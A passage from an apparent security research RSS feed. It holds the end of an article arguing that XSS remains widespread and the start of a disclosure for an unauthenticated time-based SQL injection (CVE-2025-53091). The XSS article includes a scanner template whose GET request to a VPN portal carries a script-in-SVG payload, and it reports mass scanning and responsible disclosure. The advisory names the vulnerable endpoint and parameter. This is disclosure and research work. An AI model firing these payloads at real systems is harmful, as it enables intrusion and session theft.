&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;        GET /ssl-vpn/getconfig.esp?client-type=1&amp;amp;amp;protocol-version=p1&amp;amp;amp;app-version=3.0.1-10&amp;amp;amp;clientos=Linux&amp;amp;amp;os-version=linux-64&amp;amp;amp;hmac-algo=sha1%2Cmd5&amp;amp;amp;enc-algo=aes-128-cbc%2Caes-256-cbc&amp;amp;amp;authcookie=12cea70227d3aafbf25082fac1b6f51d&amp;amp;amp;portal=us-vpn-gw-N&amp;amp;amp;user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&amp;amp;amp;domain=%28empty_domain%29&amp;amp;amp;computer=computer HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;        Host: {{Hostname}}
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    matchers-condition: and
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;    matchers:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;      - type: word
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;        part: body
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;        words:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;          - &amp;amp;#39;&amp;lt;/span&amp;gt;&amp;amp;lt;script&amp;amp;gt;prompt&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;XSS&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;          - &amp;amp;#39;&amp;lt;/span&amp;gt;authentication cookie&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#39;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        condition: and
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;      - type: status
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;        status:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;          - &amp;lt;span class=&amp;#34;m&amp;#34;&amp;gt;200&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;c1&amp;#34;&amp;gt;# digest: 490a0046304402202037be3477c0e16d7bb7cfb9874bf1cb6894a1d8035d64115db72607a539a54502203a1dac9b97514abef71fdb6a73d681f64f788f43605f2235f1fbfd26f6ddac2c:922c64590222798bb761d5b6d8e72950&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;We obtained a significant number of vulnerable hosts. Next, we tried to identify, among these results, any hosts that had a public VDP, so that we could notify them of the vulnerability. This step is a bit complex to do manually, so we used artificial intelligence to cross-reference the domains extracted from &amp;lt;b&amp;gt;&amp;lt;code&amp;gt;Shodan&amp;lt;/code&amp;gt;&amp;lt;/b&amp;gt; with information available on the internet about companies that have bug bounty programs or open VDPs.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;During this research, we found only two domains with public VDPs - one a large private sector company, the other a government agency. Both are based in the United States: one with a VDP hosted on BugCrowd and the other with a private VDP, accessible via email.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;We reported both vulnerabilities to the companies responsibly.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-4.png&amp;#34;
	width=&amp;#34;1477&amp;#34;
	height=&amp;#34;318&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-4_hu_4ef3b501dfbf457c.png 480w, /articles/xss-nao-esta-morto/image-4_hu_b14be945089ea159.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;POC of Reflected XSS on one of the identified targets&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;464&amp;#34;
		data-flex-basis=&amp;#34;1114px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-5.png&amp;#34;
	width=&amp;#34;1324&amp;#34;
	height=&amp;#34;691&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-5_hu_6322dbd059060c9c.png 480w, /articles/xss-nao-esta-morto/image-5_hu_9279a9a4ff7f61a6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Responsible Disclosure via Bugcrowd&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;It is important to note that the sample tested represents only a fraction of the systems exposed.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;more-numbers&amp;#34;&amp;gt;&amp;lt;strong&amp;gt;More numbers&amp;lt;/strong&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;If you&amp;#39;re still not convinced by the amount of XSS we have out there, we can do another simple search in the &amp;lt;i&amp;gt;GitHub Advisory Database&amp;lt;/i&amp;gt; where we get a return of over &amp;lt;b&amp;gt;31,611 XSS-related occurrences&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-6.png&amp;#34;
	width=&amp;#34;2692&amp;#34;
	height=&amp;#34;1404&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-6_hu_8944e16afc8c1393.png 480w, /articles/xss-nao-esta-morto/image-6_hu_aa853c3ed0f5991.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;XSS search on GitHub Advisory Database&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;460px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A search in the &amp;lt;b&amp;gt;CVE (Common Vulnerabilities and Exposures)&amp;lt;/b&amp;gt; database also reveals a significant number of registered vulnerabilities related to XSS, demonstrating its recurrence in different systems, applications and contexts over the years.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-7.png&amp;#34;
	width=&amp;#34;1096&amp;#34;
	height=&amp;#34;866&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-7_hu_dacb254ef186816c.png 480w, /articles/xss-nao-esta-morto/image-7_hu_272a9901a5e54f76.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;XSS search on MITRE&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;126&amp;#34;
		data-flex-basis=&amp;#34;303px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;In addition, a search carried out on the &amp;lt;b&amp;gt;HackerOne&amp;lt;/b&amp;gt; platform, widely recognized in the &amp;lt;i&amp;gt;Bug Bounty&amp;lt;/i&amp;gt; ecosystem, results in a total of &amp;lt;b&amp;gt;2,225 public reports&amp;lt;/b&amp;gt; involving Cross-Site Scripting vulnerabilities. This data reinforces not only the prevalence of XSS, but also the security community&amp;#39;s continued interest in exploiting and reporting it, even in environments with high security standards.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/image-8.png&amp;#34;
	width=&amp;#34;1178&amp;#34;
	height=&amp;#34;831&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/image-8_hu_2eaf7efd23d706c8.png 480w, /articles/xss-nao-esta-morto/image-8_hu_c63b99d525b540c3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;XSS search on HackerOne&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;141&amp;#34;
		data-flex-basis=&amp;#34;340px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;what-can-you-do-with-an-xss-besides-alert1&amp;#34;&amp;gt;&amp;lt;strong&amp;gt;What can you do with an XSS besides alert(1)?&amp;lt;/strong&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The famous alert(1) is often the first example used to demonstrate an XSS flaw.  However, the real impacts of this vulnerability go far beyond a simple alert window. Below, we list some classic and well-known malicious actions that can be carried out by an attacker when exploiting a Cross-Site Scripting flaw:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Cookie Theft&amp;lt;/b&amp;gt;, (if the cookie is not protected with the HttpOnly flag);&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Session Hijacking&amp;lt;/b&amp;gt;, assuming the victim&amp;#39;s identity in authenticated applications;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Keylogging&amp;lt;/b&amp;gt;, capturing everything the user types on the compromised page;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Malicious Redirects&amp;lt;/b&amp;gt; to fake pages, with the aim of applying scams;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Performing actions on behalf of the user&amp;lt;/b&amp;gt;, such as sending messages, changing settings or deleting data;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Remote Code Execution&amp;lt;/b&amp;gt;, although rare and depending on the specific context, it may be possible to gain remote access to the system from an XSS.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;These examples show that even though XSS is an often underestimated vulnerability, it can have serious consequences, especially when exploited in applications with sensitive data or with a high level of privilege for the affected user.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;conclusion&amp;#34;&amp;gt;&amp;lt;strong&amp;gt;Conclusion&amp;lt;/strong&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;XSS is not dead, perhaps it has just been ignored in the face of new, more &amp;#39;glamorous&amp;#39; threats. But its silent presence continues to offer an exploitable attack surface, often with critical impact.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Despite often being classified as a vulnerability of &amp;lt;i&amp;gt;medium&amp;lt;/i&amp;gt; or even &amp;lt;i&amp;gt;low&amp;lt;/i&amp;gt; severity, &amp;lt;b&amp;gt;XSS should not be underestimated&amp;lt;/b&amp;gt;. &amp;lt;b&amp;gt;Its impact can be significant, especially when it involves stealing cookies, session hijacking or redirecting to malicious pages. And what&amp;#39;s more dangerous: traditional protections are not always enough to prevent the user from being tricked into clicking on that phishing site that is using a legitimate URL with an XSS vulnerability&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After all, XSS often depends on a single click, and in this scenario, &amp;lt;b&amp;gt;the weakest link is usually the user themselves&amp;lt;/b&amp;gt;. It doesn&amp;#39;t matter how robust your framework is or how well configured your WAF is: if the attacker manages to create a convincing malicious link, all it takes is one inattentive action by the victim for the attack to materialize.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;While we rely on frameworks and WAFs, the attacker relies on our carelessness and the user&amp;#39;s curiosity.&amp;lt;/b&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Despite often being classified as a vulnerability of &amp;lt;em&amp;gt;medium&amp;lt;/em&amp;gt; or even &amp;lt;em&amp;gt;low&amp;lt;/em&amp;gt; severity, &amp;lt;strong&amp;gt;XSS should not be underestimated&amp;lt;/strong&amp;gt;. Its impact can be significant, especially when it involves stealing cookies, session hijacking or redirecting to malicious pages. And what&amp;amp;rsquo;s more dangerous: &amp;lt;strong&amp;gt;traditional protections are not always enough to prevent the user from being tricked into clicking on that phishing site that is using a legitimate URL with an XSS vulnerability.&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;After all, XSS often depends on a single click, and in this scenario, &amp;lt;strong&amp;gt;the weakest link is usually the user themselves&amp;lt;/strong&amp;gt;. It doesn&amp;amp;rsquo;t matter how robust your framework is or how well configured your WAF is: if the attacker manages to create a convincing malicious link, all it takes is one inattentive action by the victim for the attack to materialize.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;While we rely on frameworks and WAFs, the attacker relies on our carelessness and the user&amp;amp;rsquo;s curiosity.&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/articles/xss-nao-esta-morto/xss-is-not-dead.png&amp;#34;
	width=&amp;#34;1200&amp;#34;
	height=&amp;#34;600&amp;#34;
	srcset=&amp;#34;/articles/xss-nao-esta-morto/xss-is-not-dead_hu_f6aedbe45d16af84.png 480w, /articles/xss-nao-esta-morto/xss-is-not-dead_hu_f5fd8f4a58fac159.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;200&amp;#34;
		data-flex-basis=&amp;#34;480px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;written-by&amp;#34;&amp;gt;Written by
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;partnership&amp;#34;&amp;gt;Partnership
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://hacktiba.github.io/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/partners/hacktiba60x60.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; This post was made in partnership with &amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://hacktiba.github.io/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Hacktiba&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt; for Pulse 07.&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53091</title>
        <link>https://www.cvehunters.com/p/cve-2025-53091/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53091/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53091-unauthenticated-time-based-sql-injection-vulnerability-in-almox-parameter&amp;#34;&amp;gt;CVE-2025-53091: Unauthenticated Time-Based SQL Injection Vulnerability in &amp;lt;code&amp;gt;almox&amp;lt;/code&amp;gt; Parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53091&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53091&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Time-Based Blind SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;almox&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/controle/getProdutosPorAlmox.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the almox parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database. This specific vulnerability is blind in nature and was confirmed using time-based inference (SLEEP() function).&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53091-unauthenticated-time-based-sql-injection-vulnerability-in-almox-parameter&amp;#34;&amp;gt;CVE-2025-53091: Unauthenticated Time-Based SQL Injection Vulnerability in &amp;lt;code&amp;gt;almox&amp;lt;/code&amp;gt; Parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53091&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53091&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Time-Based Blind SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;almox&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/controle/getProdutosPorAlmox.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the almox parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database. This specific vulnerability is blind in nature and was confirmed using time-based inference (SLEEP() function).&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The vulnerable request does not require any form of authentication (no cookies, tokens, or headers required), making it especially critical.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Below are two working proof-of-concept HTTP requests that demonstrate the vulnerability. The difference in response time clearly confirms the execution of the SLEEP() function in the backend:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53091/image.png&amp;#34;
	width=&amp;#34;1764&amp;#34;
	height=&amp;#34;856&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53091/image_hu_a59a17384516386a.png 480w, /p/cve-2025-53091/image_hu_9f758b97b421d6c3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;206&amp;#34;
		data-flex-basis=&amp;#34;494px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53091/image-1.png&amp;#34;
	width=&amp;#34;1773&amp;#34;
	height=&amp;#34;847&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53091/image-1_hu_862f1352375e1c2.png 480w, /p/cve-2025-53091/image-1_hu_47187b954f8b5b0c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;502px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx#advisory-comment-130861&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx#advisory-comment-130861&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
